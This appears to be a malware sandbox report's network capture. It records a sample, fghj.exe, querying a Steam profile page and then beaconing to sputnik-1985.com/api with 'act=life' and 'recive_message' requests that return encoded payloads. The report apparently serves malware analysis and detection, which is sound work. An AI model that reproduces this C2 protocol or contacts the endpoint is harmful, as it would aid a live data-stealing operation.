                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.605536938 CET1.1.1.1192.168.2.90xd600No error (0)sputnik-1985.com104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.605536938 CET1.1.1.1192.168.2.90xd600No error (0)sputnik-1985.com104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.605536938 CET1.1.1.1192.168.2.90xd600No error (0)sputnik-1985.com104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.605536938 CET1.1.1.1192.168.2.90xd600No error (0)sputnik-1985.com104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.605536938 CET1.1.1.1192.168.2.90xd600No error (0)sputnik-1985.com104.21.32.1A (IP address)IN (0x0001)false

                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                  • steamcommunity.com
                                                                                                                                                                                                                  • sputnik-1985.com

                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  0192.168.2.949815104.102.49.2544437372C:\Users\user\Desktop\fghj.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2025-01-10 10:47:49 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                  2025-01-10 10:47:49 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                  Date: Fri, 10 Jan 2025 10:47:49 GMT
                                                                                                                                                                                                                  Content-Length: 35126
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: sessionid=36040cf56fdd0806ec6424e9; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                  2025-01-10 10:47:49 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                  2025-01-10 10:47:49 UTC16384INData Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f
                                                                                                                                                                                                                  Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
                                                                                                                                                                                                                  2025-01-10 10:47:49 UTC3768INData Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f
                                                                                                                                                                                                                  Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
                                                                                                                                                                                                                  2025-01-10 10:47:49 UTC495INData Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                  Data Ascii: criber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  1192.168.2.949826104.21.96.14437372C:\Users\user\Desktop\fghj.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2025-01-10 10:47:50 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                                                                  Host: sputnik-1985.com
                                                                                                                                                                                                                  2025-01-10 10:47:50 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                                                                                  2025-01-10 10:47:50 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Fri, 10 Jan 2025 10:47:50 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=n96br7ilcljno6m6ljkon2mj4s; expires=Tue, 06 May 2025 04:34:29 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dNb0TkmL98nUJbToZIC9rKI3mT%2F0SM1oxFChmWZJ99SpHD95E7rjFHrmiSi79MarmowKvcmHe2LxE0qTcgOhn4WD5wCTOQuE63dIQgaFfKOeHGrzD0LIkBfwwlb69StNq%2Bv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8ffc175a8ccb72a4-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1963&rtt_var=746&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1457813&cwnd=212&unsent_bytes=0&cid=841b467dd1de6c87&ts=449&x=0"
                                                                                                                                                                                                                  2025-01-10 10:47:50 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                  Data Ascii: 2ok
                                                                                                                                                                                                                  2025-01-10 10:47:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  2192.168.2.949832104.21.96.14437372C:\Users\user\Desktop\fghj.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                  Content-Length: 86
                                                                                                                                                                                                                  Host: sputnik-1985.com
                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                                                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Fri, 10 Jan 2025 10:47:51 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=9ct2dr1in82v6fm19t72vm1473; expires=Tue, 06 May 2025 04:34:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VMKdYxomzUDJ2OJ0vW7V7NPz11jeTCNb0zYj2UZK%2F2YBWJvCBY1%2Br2zDAbQ7WjtIQ4E6QcsFdbupO%2BMUjLl4HliaeLnxMA3gm6k8GAIL92tWN96uhBhICC2MMzUBxA5f1ixs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8ffc17613a9c72a4-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1976&rtt_var=752&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=986&delivery_rate=1445544&cwnd=212&unsent_bytes=0&cid=8e4a9285321fd0b1&ts=492&x=0"
                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC248INData Raw: 63 35 66 0d 0a 6f 30 32 63 6f 54 4b 43 36 52 56 76 76 4d 41 57 32 6c 74 6b 56 49 56 41 6e 46 44 46 30 4e 7a 48 57 45 44 6f 37 53 35 52 4a 61 72 59 62 2b 71 44 43 4c 62 46 4e 78 7a 5a 34 69 79 38 4f 67 67 6e 34 47 79 2b 4d 61 48 79 35 71 45 35 4c 4a 75 49 41 6e 4e 54 78 34 46 33 2b 73 42 65 38 59 77 35 54 64 6d 34 4e 4f 41 41 48 33 62 67 4c 72 35 71 35 37 57 32 70 54 6b 73 69 6f 78 46 50 6c 58 47 77 43 58 77 78 6c 72 6e 69 6e 45 4f 30 4b 31 7a 76 7a 34 46 50 75 73 70 38 54 69 6f 38 76 44 6c 50 54 72 4b 31 77 77 63 51 4e 37 43 41 50 33 53 57 61 43 55 4f 52 53 65 70 58 6a 34 59 55 59 31 34 43 4c 77 4e 71 47 37 74 4b 38 77 4a 49 75 4a 52 43 46 4d 7a 4d 73 6c 2f 73 56 62 37 59 4e 6c 41 39 71 71 65 4c 6b 30 42 58 61 70 59 76 6b 71 35 2b 72
                                                                                                                                                                                                                  Data Ascii: c5fo02coTKC6RVvvMAW2ltkVIVAnFDF0NzHWEDo7S5RJarYb+qDCLbFNxzZ4iy8Oggn4Gy+MaHy5qE5LJuIAnNTx4F3+sBe8Yw5Tdm4NOAAH3bgLr5q57W2pTksioxFPlXGwCXwxlrninEO0K1zvz4FPusp8Tio8vDlPTrK1wwcQN7CAP3SWaCUORSepXj4YUY14CLwNqG7tK8wJIuJRCFMzMsl/sVb7YNlA9qqeLk0BXapYvkq5+r
                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC1369INData Raw: 2b 39 67 67 68 6d 35 35 5a 50 6c 66 4f 67 54 43 77 32 68 44 6e 68 7a 64 56 6e 71 70 34 74 6a 77 46 4f 65 41 6a 2f 69 43 6f 73 72 32 74 4d 69 61 41 67 45 4d 38 53 63 4c 47 4a 2f 66 45 58 2b 65 44 63 51 4c 64 34 6a 72 34 50 68 35 32 76 32 4c 65 49 71 53 78 71 71 67 72 59 70 58 42 56 58 4e 41 78 49 46 33 76 73 56 65 34 59 5a 33 48 39 61 70 66 37 30 72 44 54 2f 71 4c 2f 34 2f 72 62 32 39 70 54 30 6f 67 49 42 47 4e 30 72 46 78 79 2f 2b 67 78 36 67 6a 47 39 4e 68 75 4a 58 76 53 6b 42 4f 76 46 67 78 48 4b 34 2f 4b 66 6c 50 53 37 4b 31 77 77 37 51 73 76 43 4a 50 48 41 57 4f 75 5a 64 78 2f 59 72 33 47 71 50 77 4d 34 37 53 48 73 4f 4b 6d 30 76 61 77 78 4b 34 2b 49 53 48 4d 4a 69 4d 59 33 76 70 73 51 77 59 5a 38 41 64 53 31 64 50 67 6d 53 43 2b 6e 4a 66 4a 79 2f 2f
                                                                                                                                                                                                                  Data Ascii: +9gghm55ZPlfOgTCw2hDnhzdVnqp4tjwFOeAj/iCosr2tMiaAgEM8ScLGJ/fEX+eDcQLd4jr4Ph52v2LeIqSxqqgrYpXBVXNAxIF3vsVe4YZ3H9apf70rDT/qL/4/rb29pT0ogIBGN0rFxy/+gx6gjG9NhuJXvSkBOvFgxHK4/KflPS7K1ww7QsvCJPHAWOuZdx/Yr3GqPwM47SHsOKm0vawxK4+ISHMJiMY3vpsQwYZ8AdS1dPgmSC+nJfJy//
                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC1369INData Raw: 59 73 54 50 53 79 73 48 6b 49 45 65 36 63 67 53 31 59 68 35 41 39 6d 30 4e 4b 64 33 48 33 62 67 4c 72 35 71 35 37 2b 32 6f 44 38 74 69 34 56 43 4e 6b 33 45 79 53 48 39 30 56 2f 6b 69 33 73 46 31 4b 39 36 76 44 45 50 50 65 77 6b 2f 6a 4f 74 38 76 44 6c 50 54 72 4b 31 77 77 48 51 4d 54 4d 49 4c 7a 32 55 2b 36 46 63 42 75 65 76 54 71 68 65 51 45 36 70 33 71 2b 50 71 36 79 74 61 38 2b 49 6f 32 43 53 54 42 41 79 38 77 6f 39 4d 31 58 35 49 64 2b 41 4e 69 69 63 37 77 38 46 44 50 75 4c 76 4a 79 36 66 4b 35 76 58 70 36 79 71 42 4c 4a 55 54 6e 77 6a 37 33 67 30 2b 75 6b 6a 63 4b 30 75 49 73 2b 44 34 44 50 75 77 6b 39 6a 4b 31 74 37 43 75 4f 79 69 4d 6a 6b 45 2f 51 63 6a 41 4c 2f 6a 50 55 4f 65 4d 5a 52 2f 62 70 47 61 79 65 55 68 32 34 44 71 2b 61 75 65 45 72 72 49
                                                                                                                                                                                                                  Data Ascii: YsTPSysHkIEe6cgS1Yh5A9m0NKd3H3bgLr5q57+2oD8ti4VCNk3EySH90V/ki3sF1K96vDEPPewk/jOt8vDlPTrK1wwHQMTMILz2U+6FcBuevTqheQE6p3q+Pq6yta8+Io2CSTBAy8wo9M1X5Id+ANiic7w8FDPuLvJy6fK5vXp6yqBLJUTnwj73g0+ukjcK0uIs+D4DPuwk9jK1t7CuOyiMjkE/QcjAL/jPUOeMZR/bpGayeUh24Dq+aueErrI
                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC188INData Raw: 45 55 38 54 38 44 4f 49 50 72 4e 56 75 61 47 63 67 4c 55 73 48 79 32 4e 41 30 35 37 44 44 2b 50 36 4f 2b 75 71 30 78 4b 4d 72 42 44 44 52 66 69 4a 6c 76 79 38 35 66 34 49 68 68 54 63 48 73 62 66 67 2b 43 6e 61 2f 59 76 49 38 70 37 32 79 71 54 45 71 69 34 4e 43 4e 45 4c 42 79 53 66 73 77 6c 54 6f 69 6e 6b 43 33 36 5a 78 76 54 30 42 4d 75 45 74 76 6e 7a 6e 74 61 62 6c 59 6d 4b 6c 71 48 6c 78 5a 76 4b 42 4d 4c 44 61 45 4f 65 48 4e 31 57 65 72 6e 65 30 4d 51 6b 77 37 69 37 30 4f 36 79 2b 74 61 45 32 4b 34 2b 4a 54 54 5a 43 79 63 55 6a 39 4d 56 54 34 34 52 0d 0a
                                                                                                                                                                                                                  Data Ascii: EU8T8DOIPrNVuaGcgLUsHy2NA057DD+P6O+uq0xKMrBDDRfiJlvy85f4IhhTcHsbfg+Cna/YvI8p72yqTEqi4NCNELBySfswlToinkC36ZxvT0BMuEtvnzntablYmKlqHlxZvKBMLDaEOeHN1Werne0MQkw7i70O6y+taE2K4+JTTZCycUj9MVT44R
                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC1369INData Raw: 38 34 65 0d 0a 34 41 74 62 69 4f 76 67 2b 48 6e 61 2f 59 74 73 6c 72 4c 79 34 35 53 56 73 6b 38 39 4c 50 77 65 51 67 53 50 33 78 56 62 6c 68 33 59 4c 31 71 64 38 76 44 67 41 4d 4f 51 74 2b 6a 65 6d 76 62 71 70 4e 43 69 4c 6a 6b 41 34 53 4d 50 45 62 37 43 44 56 2f 6a 4c 4c 30 33 76 6f 57 4b 76 4b 51 70 32 2b 47 7a 6e 63 71 43 2b 2f 76 31 36 49 35 69 46 52 6a 31 43 78 38 51 73 38 63 52 64 35 6f 64 39 42 4e 61 6b 65 37 45 72 42 54 72 70 4a 66 41 2b 71 62 2b 30 70 6a 64 69 78 4d 39 4c 4b 77 65 51 67 51 50 35 7a 6e 37 72 68 33 42 4e 77 65 78 74 2b 44 34 4b 64 72 39 69 38 6a 69 72 75 37 36 73 50 79 71 42 68 6b 6b 79 54 4d 33 43 4b 66 50 4d 57 66 4b 42 64 41 50 64 72 6e 69 2b 4f 41 55 6b 37 79 75 2b 66 4f 65 31 70 75 56 69 59 71 75 42 51 53 64 41 32 49 45 77 73
                                                                                                                                                                                                                  Data Ascii: 84e4AtbiOvg+Hna/YtslrLy45SVsk89LPweQgSP3xVblh3YL1qd8vDgAMOQt+jemvbqpNCiLjkA4SMPEb7CDV/jLL03voWKvKQp2+GzncqC+/v16I5iFRj1Cx8Qs8cRd5od9BNake7ErBTrpJfA+qb+0pjdixM9LKweQgQP5zn7rh3BNwext+D4Kdr9i8jiru76sPyqBhkkyTM3CKfPMWfKBdAPdrni+OAUk7yu+fOe1puViYquBQSdA2IEws
                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC764INData Raw: 4d 66 77 72 64 73 44 54 32 65 51 45 75 70 33 71 2b 47 36 43 67 73 4c 56 36 50 63 53 57 44 44 52 4c 69 4a 6c 76 2b 73 6c 66 35 49 78 37 43 39 75 6b 65 62 6b 32 42 7a 62 6f 4a 76 55 37 6f 62 4f 7a 6f 44 63 6d 6d 49 56 48 50 45 76 42 7a 53 4b 2b 6a 52 44 6e 6b 7a 64 56 6e 70 4e 35 74 6a 63 42 49 4b 63 39 73 43 76 6e 74 62 4c 6c 59 6d 4b 4c 67 30 4d 77 53 4d 76 43 4c 76 54 52 51 75 79 43 66 77 6a 53 71 58 71 2b 4b 77 41 35 37 69 48 39 4f 36 43 36 73 71 38 35 4a 63 72 42 44 44 52 66 69 4a 6c 76 33 64 52 41 37 63 74 6f 51 38 66 69 63 37 52 35 58 6e 62 76 4c 2f 59 34 6f 37 57 7a 6f 6a 77 72 6d 49 5a 4a 50 55 66 4d 79 69 44 34 78 31 50 67 6d 58 45 4a 31 71 46 35 74 54 63 46 4d 71 64 73 76 6a 57 2f 38 75 62 6c 43 43 2b 45 6c 45 4d 30 56 73 4b 42 4d 4c 44 61 45 4f
                                                                                                                                                                                                                  Data Ascii: MfwrdsDT2eQEup3q+G6CgsLV6PcSWDDRLiJlv+slf5Ix7C9ukebk2BzboJvU7obOzoDcmmIVHPEvBzSK+jRDnkzdVnpN5tjcBIKc9sCvntbLlYmKLg0MwSMvCLvTRQuyCfwjSqXq+KwA57iH9O6C6sq85JcrBDDRfiJlv3dRA7ctoQ8fic7R5XnbvL/Y4o7WzojwrmIZJPUfMyiD4x1PgmXEJ1qF5tTcFMqdsvjW/8ublCC+ElEM0VsKBMLDaEO
                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC1369INData Raw: 38 36 35 0d 0a 76 44 49 51 71 43 55 4f 52 53 65 70 58 6a 34 59 55 59 34 37 69 50 32 50 4b 75 36 75 72 63 36 4b 59 4f 41 54 54 78 48 79 38 41 6c 39 74 46 57 34 49 42 2f 43 74 61 6d 65 71 6f 34 43 58 61 70 59 76 6b 71 35 2b 72 2b 6c 43 77 6c 6a 59 41 4f 47 6b 44 54 77 43 58 39 79 46 79 67 6c 44 6b 55 6e 71 56 34 2b 47 46 47 4f 2b 73 76 2b 69 43 72 73 72 36 73 50 53 69 59 67 45 4d 2b 52 4d 6a 45 50 66 2f 52 58 2b 75 4f 64 41 6e 52 72 58 69 77 4d 30 5a 34 70 79 58 6d 63 76 2f 79 6b 71 59 72 4b 4d 69 6f 56 69 56 41 78 4e 41 6b 38 38 38 51 2f 38 56 75 54 64 6d 75 4e 4f 42 35 42 6a 66 71 4d 50 73 7a 72 62 69 7a 72 54 55 6e 6a 34 42 49 4e 30 7a 47 30 79 48 78 77 31 62 72 69 6e 49 4f 31 61 68 36 73 53 74 47 65 4b 63 6c 35 6e 4c 2f 38 70 53 2b 4f 79 2b 47 7a 57 49
                                                                                                                                                                                                                  Data Ascii: 865vDIQqCUORSepXj4YUY47iP2PKu6urc6KYOATTxHy8Al9tFW4IB/Ctameqo4CXapYvkq5+r+lCwljYAOGkDTwCX9yFyglDkUnqV4+GFGO+sv+iCrsr6sPSiYgEM+RMjEPf/RX+uOdAnRrXiwM0Z4pyXmcv/ykqYrKMioViVAxNAk888Q/8VuTdmuNOB5BjfqMPszrbizrTUnj4BIN0zG0yHxw1brinIO1ah6sStGeKcl5nL/8pS+Oy+GzWI
                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC787INData Raw: 79 7a 77 7a 46 48 73 6a 33 34 44 31 2b 49 36 2b 44 34 65 64 72 39 69 79 43 4b 67 71 72 4f 31 65 42 43 4a 6e 6c 30 6d 53 74 6a 48 62 64 48 41 58 4f 4f 4f 63 42 32 65 76 54 71 68 65 51 45 36 70 33 71 2b 4d 71 4f 2b 76 61 49 30 4c 59 65 41 53 7a 68 49 77 73 38 39 38 63 5a 59 37 49 4e 36 48 39 53 6f 5a 72 45 77 43 7a 6a 76 4d 50 31 79 36 66 4b 35 76 58 70 36 79 72 31 47 4d 45 76 65 7a 43 43 2b 33 42 37 35 79 33 41 42 6e 76 6f 30 71 69 73 47 50 65 63 6c 38 43 43 6d 75 72 47 76 4f 69 53 42 68 55 38 36 51 38 62 49 4b 66 2f 4f 55 65 47 4c 63 67 33 58 73 48 6e 34 64 30 59 78 2f 32 4b 6d 63 70 43 2b 74 5a 51 35 4e 4d 71 51 41 69 6f 48 7a 38 31 76 70 6f 4e 52 38 6f 5a 2f 43 64 36 76 63 72 4d 34 42 7a 58 6e 49 76 30 79 6f 72 6d 78 6f 7a 30 76 67 49 5a 46 49 55 2f 4d
                                                                                                                                                                                                                  Data Ascii: yzwzFHsj34D1+I6+D4edr9iyCKgqrO1eBCJnl0mStjHbdHAXOOOcB2evTqheQE6p3q+MqO+vaI0LYeASzhIws898cZY7IN6H9SoZrEwCzjvMP1y6fK5vXp6yr1GMEvezCC+3B75y3ABnvo0qisGPecl8CCmurGvOiSBhU86Q8bIKf/OUeGLcg3XsHn4d0Yx/2KmcpC+tZQ5NMqQAioHz81vpoNR8oZ/Cd6vcrM4BzXnIv0yormxoz0vgIZFIU/M
